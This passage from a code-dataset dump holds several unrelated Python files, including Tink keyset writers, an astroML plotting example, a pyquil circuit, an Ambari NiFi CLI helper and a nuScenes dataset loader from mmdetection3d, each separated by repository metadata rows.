def write(self, keyset: tink_pb2.Keyset) -> None:
"""Tries to write a tink_pb2.Keyset to some storage system."""
pass
@abc.abstractmethod
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
"""Tries to write an tink_pb2.EncryptedKeyset to some storage system."""
pass
class JsonKeysetWriter(KeysetWriter):
"""Writes keysets in proto JSON wire format to some storage system.
cf. https://developers.google.com/protocol-buffers/docs/encoding
"""
def __init__(self, text_io_stream: io.TextIOBase):
self._io_stream = text_io_stream
def write(self, keyset: tink_pb2.Keyset) -> None:
if not isinstance(keyset, tink_pb2.Keyset):
raise tink_error.TinkError('invalid keyset.')
json_keyset = json_format.MessageToJson(keyset)
# TODO(b/141106504) Needed for python 2.7 compatibility. StringIO expects
# unicode, but MessageToJson outputs UTF-8.
if isinstance(json_keyset, bytes):
json_keyset = json_keyset.decode('utf-8')
self._io_stream.write(json_keyset)
self._io_stream.flush()
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
if not isinstance(encrypted_keyset, tink_pb2.EncryptedKeyset):
raise tink_error.TinkError('invalid encrypted keyset.')
json_keyset = json_format.MessageToJson(encrypted_keyset)
# TODO(b/141106504) Needed for python 2.7 compatibility. StringIO expects
# unicode, but MessageToJson outputs UTF-8.
if isinstance(json_keyset, bytes):
json_keyset = json_keyset.decode('utf-8')
self._io_stream.write(json_keyset)
self._io_stream.flush()
class BinaryKeysetWriter(KeysetWriter):
"""Writes keysets in proto binary wire format to some storage system.
cf. https://developers.google.com/protocol-buffers/docs/encoding
"""
def __init__(self, binary_io_stream: io.BufferedIOBase):
self._io_stream = binary_io_stream
def write(self, keyset: tink_pb2.Keyset) -> None:
if not isinstance(keyset, tink_pb2.Keyset):
raise tink_error.TinkError('invalid keyset.')
self._io_stream.write(keyset.SerializeToString())
self._io_stream.flush()
def write_encrypted(self, encrypted_keyset: tink_pb2.EncryptedKeyset) -> None:
if not isinstance(encrypted_keyset, tink_pb2.EncryptedKeyset):
raise tink_error.TinkError('invalid encrypted keyset.')
self._io_stream.write(encrypted_keyset.SerializeToString())
self._io_stream.flush()
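# Illustrative sketch (not part of Tink): writing a keyset to an in-memory text stream
# with the JSON writer. The empty Keyset below is only a placeholder -- a real keyset
# would normally be produced and managed through a keyset handle.
def _example_json_write() -> str:
    stream = io.StringIO()
    writer = JsonKeysetWriter(stream)
    writer.write(tink_pb2.Keyset())
    return stream.getvalue()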
| [
"[email protected]"
] | |
19b16e038e42e69f3f52b17764d02d98614b0c87 | 364b36d699d0a6b5ddeb43ecc6f1123fde4eb051 | /_downloads_1ed/fig_XD_example.py | 6e7d5247c12d7f1e576f8087307c0067916096aa | [] | no_license | astroML/astroml.github.com | eae3bfd93ee2f8bc8b5129e98dadf815310ee0ca | 70f96d04dfabcd5528978b69c217d3a9a8bc370b | refs/heads/master | 2022-02-27T15:31:29.560052 | 2022-02-08T21:00:35 | 2022-02-08T21:00:35 | 5,871,703 | 2 | 5 | null | 2022-02-08T21:00:36 | 2012-09-19T12:55:23 | HTML | UTF-8 | Python | false | false | 3,918 | py | """
Extreme Deconvolution example
-----------------------------
Figure 6.11
An example of extreme deconvolution showing a simulated two-dimensional
distribution of points, where the positions are subject to errors. The top two
panels show the distributions with small (left) and large (right) errors. The
bottom panels show the densities derived from the noisy sample (top-right
panel) using extreme deconvolution; the resulting distribution closely matches
that shown in the top-left panel.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from astroML.decorators import pickle_results
from astroML.density_estimation import XDGMM
from astroML.plotting.tools import draw_ellipse
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Sample the dataset
N = 2000
np.random.seed(0)
# generate the true data
x_true = (1.4 + 2 * np.random.random(N)) ** 2
y_true = 0.1 * x_true ** 2
# add scatter to "true" distribution
dx = 0.1 + 4. / x_true ** 2
dy = 0.1 + 10. / x_true ** 2
x_true += np.random.normal(0, dx, N)
y_true += np.random.normal(0, dy, N)
# add noise to get the "observed" distribution
dx = 0.2 + 0.5 * np.random.random(N)
dy = 0.2 + 0.5 * np.random.random(N)
x = x_true + np.random.normal(0, dx)
y = y_true + np.random.normal(0, dy)
# stack the results for computation
X = np.vstack([x, y]).T
Xerr = np.zeros(X.shape + X.shape[-1:])
diag = np.arange(X.shape[-1])
Xerr[:, diag, diag] = np.vstack([dx ** 2, dy ** 2]).T
#------------------------------------------------------------
# compute and save results
@pickle_results("XD_toy.pkl")
def compute_XD_results(n_components=10, n_iter=500):
clf = XDGMM(n_components, n_iter=n_iter)
clf.fit(X, Xerr)
return clf
clf = compute_XD_results(10, 500)
sample = clf.sample(N)
#------------------------------------------------------------
# Plot the results
fig = plt.figure(figsize=(5, 3.75))
fig.subplots_adjust(left=0.1, right=0.95,
bottom=0.1, top=0.95,
wspace=0.02, hspace=0.02)
ax1 = fig.add_subplot(221)
ax1.scatter(x_true, y_true, s=4, lw=0, c='k')
ax2 = fig.add_subplot(222)
ax2.scatter(x, y, s=4, lw=0, c='k')
ax3 = fig.add_subplot(223)
ax3.scatter(sample[:, 0], sample[:, 1], s=4, lw=0, c='k')
ax4 = fig.add_subplot(224)
for i in range(clf.n_components):
draw_ellipse(clf.mu[i], clf.V[i], scales=[2], ax=ax4,
ec='k', fc='gray', alpha=0.2)
titles = ["True Distribution", "Noisy Distribution",
"Extreme Deconvolution\n resampling",
"Extreme Deconvolution\n cluster locations"]
ax = [ax1, ax2, ax3, ax4]
for i in range(4):
ax[i].set_xlim(-1, 13)
ax[i].set_ylim(-6, 16)
ax[i].xaxis.set_major_locator(plt.MultipleLocator(4))
ax[i].yaxis.set_major_locator(plt.MultipleLocator(5))
ax[i].text(0.05, 0.95, titles[i],
ha='left', va='top', transform=ax[i].transAxes)
if i in (0, 1):
ax[i].xaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_xlabel('$x$')
if i in (1, 3):
ax[i].yaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_ylabel('$y$')
plt.show()
| [
"[email protected]"
] | |
75683d574fd6fafc97d6262c264e53f43ff0a56b | 19ee7dd974ba8b1731e9450c174df7630f63eaad | /Api/recognition/serializers.py | bc1cd767bbebc3dcfc9d20d425f5e7079f0f1748 | [] | no_license | minjjjae/No-Mask-Trace-System | 12d3a5a146f5526b9dbba5a8b75d6adc6c8a2e2b | 61c76197d7ae921823b795effd9f267c92016a97 | refs/heads/main | 2023-01-19T08:35:19.643717 | 2020-11-28T05:27:52 | 2020-11-28T05:27:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from recognition.models import Recognition
from rest_framework import serializers
class RecognitionSerializer(serializers.HyperlinkedModelSerializer):
image = serializers.ImageField(max_length=None, use_url=True)
class Meta:
model = Recognition
fields = ("pk", "encodeLst", "description", "created_at", "image")
| [
"[email protected]"
] | |
2514e06398d1649d7e768e2219aa835bfc94e0c7 | dffd7156da8b71f4a743ec77d05c8ba031988508 | /joi/prelim/2019/yo1c/c.py | 8fa22ad3e7acb87ef87d1e4727e8bf36c56ef603 | [] | no_license | e1810/kyopro | a3a9a2ee63bc178dfa110788745a208dead37da6 | 15cf27d9ecc70cf6d82212ca0c788e327371b2dd | refs/heads/master | 2021-11-10T16:53:23.246374 | 2021-02-06T16:29:09 | 2021-10-31T06:20:50 | 252,388,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | n, *a = map(int, open(0).read().split())
cnt = ans = 0
prev = 0
for i in a:
if prev>i:
ans = max(ans, cnt)
cnt = 0
cnt += 1
prev = i
print(max(ans, cnt))
| [
"[email protected]"
] | |
daf6299762e39365d4e0099a36ae78a1a59bcd0a | 6ec91b363b077bffd33f15300a0935124e9fb915 | /Cracking_the_Code_Interview/Leetcode/3.String/290.Word_Pattern.py | 766301dce21b1c686fdd7e0e347044af480ca094 | [] | no_license | lzxyzq/Cracking_the_Coding_Interview | 03232515ae8eb50394d46322d36b230d1a626fcf | 79dee7dab41830c4ff9e38858dad229815c719a0 | refs/heads/master | 2023-06-05T19:52:15.595289 | 2021-06-23T22:46:02 | 2021-06-23T22:46:02 | 238,068,000 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,531 | py | '''
@Author: your name
@Date: 2020-06-09 17:21:16
@LastEditTime: 2020-06-10 12:19:27
@LastEditors: Please set LastEditors
@Description: In User Settings Edit
@FilePath: /Cracking_the_Code_Interview/Leetcode/String/290.Word_Pattern.py
'''
# Given a pattern and a string str, find if str follows the same pattern.
# Here follow means a full match, such that there is a bijection between a letter in pattern and a non-empty word in str.
'''
Example 1:
Input: pattern = "abba", str = "dog cat cat dog"
Output: true
Example 2:
Input:pattern = "abba", str = "dog cat cat fish"
Output: false
Example 3:
Input: pattern = "aaaa", str = "dog cat cat dog"
Output: false
Example 4:
Input: pattern = "abba", str = "dog dog dog dog"
Output: false
'''
# Notes:
# You may assume pattern contains only lowercase letters, and str contains lowercase letters that may be separated by a single space.
# 1.split()
# 2. check equal length with len()
# 3.hashmap key:pattern value:str
class Solution:
def wordPattern(self, pattern: str, str: str) -> bool:
str = str.split()
result = ''
if len(str) != len(pattern):
return False
d = {}
for i in range(len(pattern)):
if str[i] not in d:
if pattern[i] not in d.values():
d[str[i]] = pattern[i]
else:
return False
result += d[str[i]]
return result == pattern
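# Illustrative checks (added for clarity) mirroring the examples in the comments above:
# a full bijection between letters and words passes, a many-to-one mapping fails.
assert Solution().wordPattern("abba", "dog cat cat dog")
assert not Solution().wordPattern("abba", "dog dog dog dog")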
pattern = "abba"
str = "dog cat cat dog"
words = str.split(' ')
tuple(zip(words, pattern)) | [
"[email protected]"
] | |
6f7b09b3bc0afa1b87897d8811dee37992af9e92 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil1566.py | adf7d2e0df4b68ca67d20975984b7e68e9320ea4 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,272 | py | # qubit number=5
# total number=52
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=3
prog += H(1) # number=4
prog += X(1) # number=48
prog += H(1) # number=26
prog += CZ(4,1) # number=27
prog += H(1) # number=28
prog += H(2) # number=5
prog += H(3) # number=6
prog += H(4) # number=21
prog += H(1) # number=34
prog += CZ(4,1) # number=35
prog += Z(4) # number=46
prog += RX(0.8011061266653969,2) # number=37
prog += H(1) # number=36
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=7
prog += H(3) # number=8
prog += CNOT(1,0) # number=38
prog += X(0) # number=39
prog += CNOT(1,0) # number=40
prog += CNOT(0,1) # number=42
prog += X(1) # number=43
prog += CNOT(0,1) # number=44
prog += X(2) # number=11
prog += Y(1) # number=45
prog += X(3) # number=12
prog += H(2) # number=41
prog += CNOT(1,0) # number=22
prog += X(4) # number=47
prog += X(0) # number=23
prog += H(0) # number=49
prog += CZ(1,0) # number=50
prog += H(0) # number=51
prog += CNOT(0,1) # number=30
prog += X(1) # number=31
prog += CNOT(0,1) # number=32
prog += X(2) # number=15
prog += H(4) # number=29
prog += X(3) # number=16
prog += H(0) # number=17
prog += H(1) # number=18
prog += H(2) # number=19
prog += H(3) # number=20
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('5q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1566.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
] | |
908076fe749518b81a5d792a64a0ac250dc8aa67 | 083ca3df7dba08779976d02d848315f85c45bf75 | /LongestSubstringwithAtLeastKRepeatingCharacters5.py | 424c18652d21975839cddc18e43a9e0b3e29a8f8 | [] | no_license | jiangshen95/UbuntuLeetCode | 6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94 | fa02b469344cf7c82510249fba9aa59ae0cb4cc0 | refs/heads/master | 2021-05-07T02:04:47.215580 | 2020-06-11T02:33:35 | 2020-06-11T02:33:35 | 110,397,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | class Solution:
def longestSubstring(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
i = 0
res = 0
while i + k <= len(s):
if i > 0 and s[i] == s[i - 1]:
i += 1
continue
m = {}
mask = 0
max_index = i
for j in range(i, len(s)):
if s[j] not in m:
m[s[j]] = 0
m[s[j]] += 1
t = ord(s[j]) - ord('a')
if m[s[j]] < k:
mask |= 1 << t
else:
mask &= ~(1 << t)
if mask == 0:
max_index = j
res = max(res, j - i + 1)
i = max_index + 1
return res
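# Worked example of the bitmask idea above (illustrative): for s = "aaabb" and k = 3,
# starting at i = 0 the bit for 'a' is cleared once its count reaches 3, so mask == 0
# at j = 2 and res becomes 3, while the bit for 'b' (count 2 < k) stays set; the
# final answer is 3, i.e. the substring "aaa".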
if __name__ == '__main__':
s = input()
k = int(input())
solution = Solution()
print(solution.longestSubstring(s, k))
| [
"[email protected]"
] | |
7a7b0cb2ba35a1718311a5ace7ffe70e9f8f71bf | 7b221a4981edad73991cf1e357274b46c4054eff | /stacks/XIAOMATECH/1.0/services/NIFI/package/scripts/nifi_cli.py | e82f05e871857ac17cf7d7bf280d1558ca7ca3dc | [
"Apache-2.0"
] | permissive | aries-demos/dataops | a4e1516ef6205ad1ac5f692822e577e22ee85c70 | 436c6e89a1fdd0593a17815d3ec79c89a26d48f1 | refs/heads/master | 2020-05-29T17:20:12.854005 | 2019-05-22T06:06:00 | 2019-05-22T06:06:00 | 189,270,801 | 2 | 3 | Apache-2.0 | 2019-05-29T17:35:25 | 2019-05-29T17:35:24 | null | UTF-8 | Python | false | false | 6,474 | py | import json
import time
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from resource_management.libraries.functions import format
import nifi_toolkit_util_common
def nifi_cli(command=None,
subcommand=None,
errors_retries=12,
retries_pause=10,
acceptable_errors=None,
**command_args):
"""
    Executes a nifi cli command and returns its output.
    The command may need to be executed several times, because NiFi only becomes responsive
    after some amount of time (on a non super-fast VM it takes about 1.5 minutes before NiFi
    starts responding to cli calls). Some commands can also produce transient errors that
    disappear after a while. In other words - this cli is hard to use in automated environments :).
:param command: main cli command(nifi, registry, session, etc)
:param subcommand: sub-command of main command(nifi list-reg-clients, etc)
:param errors_retries: retries count on acceptable errors
:param retries_pause: pause between call retries
    :param acceptable_errors: errors that are acceptable for retry (the "Connection refused" error is always in this list)
:param command_args: long version of command parameters
:return: command output
"""
import params
cli_env = {"JAVA_HOME": params.java_home}
cli_script = nifi_toolkit_util_common.get_toolkit_script(
"cli.sh", params.toolkit_tmp_dir, params.stack_version_buildnum)
if errors_retries < 1:
errors_retries = 1
if acceptable_errors is None:
acceptable_errors = []
acceptable_errors.append("Connection refused")
def do_retry(output):
for acceptable_error in acceptable_errors:
if acceptable_error in output:
return True
return False
cmd = [cli_script, command]
if subcommand is not None:
cmd.append(subcommand)
client_opts = nifi_toolkit_util_common.get_client_opts()
if params.nifi_ssl_enabled:
command_args.update(nifi_toolkit_util_common.get_client_opts())
command_args["proxiedEntity"] = params.nifi_initial_admin_id
else:
command_args["baseUrl"] = client_opts["baseUrl"]
for arg_name, arg_value in command_args.iteritems():
cmd.append("--" + arg_name)
cmd.append(arg_value)
for _ in range(0, errors_retries):
errors_retries -= 1
code, out = shell.call(
cmd, sudo=True, env=cli_env, logoutput=False, quiet=True)
if code != 0 and do_retry(out) and errors_retries != 0:
time.sleep(retries_pause)
continue
elif code == 0:
return out
else:
raise Fail("Failed to execute nifi cli.sh command")
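# Illustrative sketch (not part of the original script): a direct call to nifi_cli with
# explicit retry knobs. The retry values below are hypothetical; the real callers in this
# module are the helper functions defined further down.
def _example_cli_call():
    return nifi_cli(command="nifi",
                    subcommand="list-reg-clients",
                    errors_retries=6,
                    retries_pause=5,
                    outputType="json")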
def _update_impl(client_name=None,
client_id=None,
client_url=None,
existing_clients=None):
old_name = None
old_url = None
if not client_id:
if not client_name:
raise Fail(
"For client update 'client_name' or 'client_id' must be specified"
)
for description, name, uuid, url in existing_clients:
if name == client_name:
client_id = uuid
old_name = name
old_url = url
break
else:
for description, name, uuid, url in existing_clients:
if uuid == client_id:
old_name = name
old_url = url
arguments = {"registryClientId": client_id}
do_update = False
if client_name:
if client_name != old_name:
arguments["registryClientName"] = client_name
do_update = True
Logger.info(
format(
"Trying to update NIFI Client name '{old_name}' to '{client_name}'"
))
if client_url:
if client_url != old_url:
arguments["registryClientUrl"] = client_url
do_update = True
Logger.info(
format(
"Trying update url from '{old_url}' to '{client_url}' for NIFI Client with name '{old_name}'"
))
if do_update:
nifi_cli(command="nifi", subcommand="update-reg-client", **arguments)
Logger.info(format("NIFI Client '{old_name}' updated"))
else:
Logger.info(format("NIFI Client '{old_name}' is already up-to-date"))
return client_id
def create_reg_client(client_name, client_url):
client_uuid = nifi_cli(
command="nifi",
subcommand="create-reg-client",
registryClientName=client_name,
registryClientUrl=client_url).strip()
Logger.info(
format("Created NIFI client '{client_name}' with url '{client_url}'"))
return client_uuid
def list_reg_clients():
acceptable_errors = ["Error retrieving registry clients"]
Logger.info(format("Trying to retrieve NIFI clients..."))
command_result = nifi_cli(
command="nifi",
subcommand="list-reg-clients",
acceptable_errors=acceptable_errors,
outputType="json")
result_json = json.loads(command_result)
result = []
if "registries" in result_json:
for registry in result_json["registries"]:
if "component" in registry:
component = registry["component"]
if "description" in component:
description = component["description"]
else:
description = ''
result.append((description, component["name"], component["id"],
component["uri"]))
Logger.info("Retrieved:" + str(len(result)) + " clients")
return result
def update_reg_client(client_name=None, client_id=None, client_url=None):
existing_clients = list_reg_clients()
return _update_impl(
client_name=client_name,
client_id=client_id,
client_url=client_url,
existing_clients=existing_clients)
def create_or_update_reg_client(client_name, client_url):
existing_clients = list_reg_clients()
for _, name, uuid, _ in existing_clients:
if name == client_name:
return _update_impl(
client_id=uuid,
client_url=client_url,
existing_clients=existing_clients)
return create_reg_client(client_name, client_url)
| [
"[email protected]"
] | |
cbb9422f0b2cd4ef151418716fb78d78a14bcad9 | 8ef8e6818c977c26d937d09b46be0d748022ea09 | /cv/3d_detection/BEVFormer/pytorch/mmdetection3d/mmdet3d/datasets/nuscenes_dataset.py | 47d6e15ed9aec63b17e5b80955dd4cb32ba04939 | [
"Apache-2.0"
] | permissive | Deep-Spark/DeepSparkHub | eb5996607e63ccd2c706789f64b3cc0070e7f8ef | 9d643e88946fc4a24f2d4d073c08b05ea693f4c5 | refs/heads/master | 2023-09-01T11:26:49.648759 | 2023-08-25T01:50:18 | 2023-08-25T01:50:18 | 534,133,249 | 7 | 6 | Apache-2.0 | 2023-03-28T02:54:59 | 2022-09-08T09:07:01 | Python | UTF-8 | Python | false | false | 26,116 | py | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from os import path as osp
import mmcv
import numpy as np
import pyquaternion
from nuscenes.utils.data_classes import Box as NuScenesBox
from ..core import show_result
from ..core.bbox import Box3DMode, Coord3DMode, LiDARInstance3DBoxes
from .builder import DATASETS
from .custom_3d import Custom3DDataset
from .pipelines import Compose
@DATASETS.register_module()
class NuScenesDataset(Custom3DDataset):
r"""NuScenes Dataset.
This class serves as the API for experiments on the NuScenes Dataset.
Please refer to `NuScenes Dataset <https://www.nuscenes.org/download>`_
for data downloading.
Args:
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
data_root (str): Path of dataset root.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
load_interval (int, optional): Interval of loading the dataset. It is
used to uniformly sample the dataset. Defaults to 1.
        with_velocity (bool, optional): Whether to include velocity prediction
            in the experiments. Defaults to True.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
            to its original format and then convert it to `box_type_3d`.
            Defaults to 'LiDAR' in this dataset. Available options include:
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
eval_version (bool, optional): Configuration version of evaluation.
Defaults to 'detection_cvpr_2019'.
use_valid_flag (bool, optional): Whether to use `use_valid_flag` key
in the info file as mask to filter gt_boxes and gt_names.
Defaults to False.
"""
NameMapping = {
'movable_object.barrier': 'barrier',
'vehicle.bicycle': 'bicycle',
'vehicle.bus.bendy': 'bus',
'vehicle.bus.rigid': 'bus',
'vehicle.car': 'car',
'vehicle.construction': 'construction_vehicle',
'vehicle.motorcycle': 'motorcycle',
'human.pedestrian.adult': 'pedestrian',
'human.pedestrian.child': 'pedestrian',
'human.pedestrian.construction_worker': 'pedestrian',
'human.pedestrian.police_officer': 'pedestrian',
'movable_object.trafficcone': 'traffic_cone',
'vehicle.trailer': 'trailer',
'vehicle.truck': 'truck'
}
DefaultAttribute = {
'car': 'vehicle.parked',
'pedestrian': 'pedestrian.moving',
'trailer': 'vehicle.parked',
'truck': 'vehicle.parked',
'bus': 'vehicle.moving',
'motorcycle': 'cycle.without_rider',
'construction_vehicle': 'vehicle.parked',
'bicycle': 'cycle.without_rider',
'barrier': '',
'traffic_cone': '',
}
AttrMapping = {
'cycle.with_rider': 0,
'cycle.without_rider': 1,
'pedestrian.moving': 2,
'pedestrian.standing': 3,
'pedestrian.sitting_lying_down': 4,
'vehicle.moving': 5,
'vehicle.parked': 6,
'vehicle.stopped': 7,
}
AttrMapping_rev = [
'cycle.with_rider',
'cycle.without_rider',
'pedestrian.moving',
'pedestrian.standing',
'pedestrian.sitting_lying_down',
'vehicle.moving',
'vehicle.parked',
'vehicle.stopped',
]
# https://github.com/nutonomy/nuscenes-devkit/blob/57889ff20678577025326cfc24e57424a829be0a/python-sdk/nuscenes/eval/detection/evaluate.py#L222 # noqa
ErrNameMapping = {
'trans_err': 'mATE',
'scale_err': 'mASE',
'orient_err': 'mAOE',
'vel_err': 'mAVE',
'attr_err': 'mAAE'
}
CLASSES = ('car', 'truck', 'trailer', 'bus', 'construction_vehicle',
'bicycle', 'motorcycle', 'pedestrian', 'traffic_cone',
'barrier')
def __init__(self,
ann_file,
pipeline=None,
data_root=None,
classes=None,
load_interval=1,
with_velocity=True,
modality=None,
box_type_3d='LiDAR',
filter_empty_gt=True,
test_mode=False,
eval_version='detection_cvpr_2019',
use_valid_flag=False):
self.load_interval = load_interval
self.use_valid_flag = use_valid_flag
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
self.with_velocity = with_velocity
self.eval_version = eval_version
from nuscenes.eval.detection.config import config_factory
self.eval_detection_configs = config_factory(self.eval_version)
if self.modality is None:
self.modality = dict(
use_camera=False,
use_lidar=True,
use_radar=False,
use_map=False,
use_external=False,
)
def get_cat_ids(self, idx):
"""Get category distribution of single scene.
Args:
idx (int): Index of the data_info.
Returns:
dict[list]: for each category, if the current scene
contains such boxes, store a list containing idx,
otherwise, store empty list.
"""
info = self.data_infos[idx]
if self.use_valid_flag:
mask = info['valid_flag']
gt_names = set(info['gt_names'][mask])
else:
gt_names = set(info['gt_names'])
cat_ids = []
for name in gt_names:
if name in self.CLASSES:
cat_ids.append(self.cat2id[name])
return cat_ids
def load_annotations(self, ann_file):
"""Load annotations from ann_file.
Args:
ann_file (str): Path of the annotation file.
Returns:
list[dict]: List of annotations sorted by timestamps.
"""
data = mmcv.load(ann_file, file_format='pkl')
data_infos = list(sorted(data['infos'], key=lambda e: e['timestamp']))
data_infos = data_infos[::self.load_interval]
self.metadata = data['metadata']
self.version = self.metadata['version']
return data_infos
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data
preprocessing pipelines. It includes the following keys:
- sample_idx (str): Sample index.
- pts_filename (str): Filename of point clouds.
- sweeps (list[dict]): Infos of sweeps.
- timestamp (float): Sample timestamp.
- img_filename (str, optional): Image filename.
- lidar2img (list[np.ndarray], optional): Transformations
from lidar to different cameras.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
# standard protocol modified from SECOND.Pytorch
input_dict = dict(
sample_idx=info['token'],
pts_filename=info['lidar_path'],
sweeps=info['sweeps'],
timestamp=info['timestamp'] / 1e6,
)
if self.modality['use_camera']:
image_paths = []
lidar2img_rts = []
for cam_type, cam_info in info['cams'].items():
image_paths.append(cam_info['data_path'])
# obtain lidar to image transformation matrix
lidar2cam_r = np.linalg.inv(cam_info['sensor2lidar_rotation'])
lidar2cam_t = cam_info[
'sensor2lidar_translation'] @ lidar2cam_r.T
lidar2cam_rt = np.eye(4)
lidar2cam_rt[:3, :3] = lidar2cam_r.T
lidar2cam_rt[3, :3] = -lidar2cam_t
intrinsic = cam_info['cam_intrinsic']
viewpad = np.eye(4)
viewpad[:intrinsic.shape[0], :intrinsic.shape[1]] = intrinsic
lidar2img_rt = (viewpad @ lidar2cam_rt.T)
lidar2img_rts.append(lidar2img_rt)
input_dict.update(
dict(
img_filename=image_paths,
lidar2img=lidar2img_rts,
))
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
return input_dict
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: Annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`):
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- gt_names (list[str]): Class names of ground truths.
"""
info = self.data_infos[index]
# filter out bbox containing no points
if self.use_valid_flag:
mask = info['valid_flag']
else:
mask = info['num_lidar_pts'] > 0
gt_bboxes_3d = info['gt_boxes'][mask]
gt_names_3d = info['gt_names'][mask]
gt_labels_3d = []
for cat in gt_names_3d:
if cat in self.CLASSES:
gt_labels_3d.append(self.CLASSES.index(cat))
else:
gt_labels_3d.append(-1)
gt_labels_3d = np.array(gt_labels_3d)
if self.with_velocity:
gt_velocity = info['gt_velocity'][mask]
nan_mask = np.isnan(gt_velocity[:, 0])
gt_velocity[nan_mask] = [0.0, 0.0]
gt_bboxes_3d = np.concatenate([gt_bboxes_3d, gt_velocity], axis=-1)
# the nuscenes box center is [0.5, 0.5, 0.5], we change it to be
# the same as KITTI (0.5, 0.5, 0)
gt_bboxes_3d = LiDARInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
gt_names=gt_names_3d)
return anns_results
def _format_bbox(self, results, jsonfile_prefix=None):
"""Convert the results to the standard format.
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of the output jsonfile.
You can specify the output directory/filename by
modifying the jsonfile_prefix. Default: None.
Returns:
str: Path of the output json file.
"""
nusc_annos = {}
mapped_class_names = self.CLASSES
print('Start to convert detection format...')
for sample_id, det in enumerate(mmcv.track_iter_progress(results)):
annos = []
boxes = output_to_nusc_box(det, self.with_velocity)
sample_token = self.data_infos[sample_id]['token']
boxes = lidar_nusc_box_to_global(self.data_infos[sample_id], boxes,
mapped_class_names,
self.eval_detection_configs,
self.eval_version)
for i, box in enumerate(boxes):
name = mapped_class_names[box.label]
if np.sqrt(box.velocity[0]**2 + box.velocity[1]**2) > 0.2:
if name in [
'car',
'construction_vehicle',
'bus',
'truck',
'trailer',
]:
attr = 'vehicle.moving'
elif name in ['bicycle', 'motorcycle']:
attr = 'cycle.with_rider'
else:
attr = NuScenesDataset.DefaultAttribute[name]
else:
if name in ['pedestrian']:
attr = 'pedestrian.standing'
elif name in ['bus']:
attr = 'vehicle.stopped'
else:
attr = NuScenesDataset.DefaultAttribute[name]
nusc_anno = dict(
sample_token=sample_token,
translation=box.center.tolist(),
size=box.wlh.tolist(),
rotation=box.orientation.elements.tolist(),
velocity=box.velocity[:2].tolist(),
detection_name=name,
detection_score=box.score,
attribute_name=attr)
annos.append(nusc_anno)
nusc_annos[sample_token] = annos
nusc_submissions = {
'meta': self.modality,
'results': nusc_annos,
}
mmcv.mkdir_or_exist(jsonfile_prefix)
res_path = osp.join(jsonfile_prefix, 'results_nusc.json')
print('Results writes to', res_path)
mmcv.dump(nusc_submissions, res_path)
return res_path
def _evaluate_single(self,
result_path,
logger=None,
metric='bbox',
result_name='pts_bbox'):
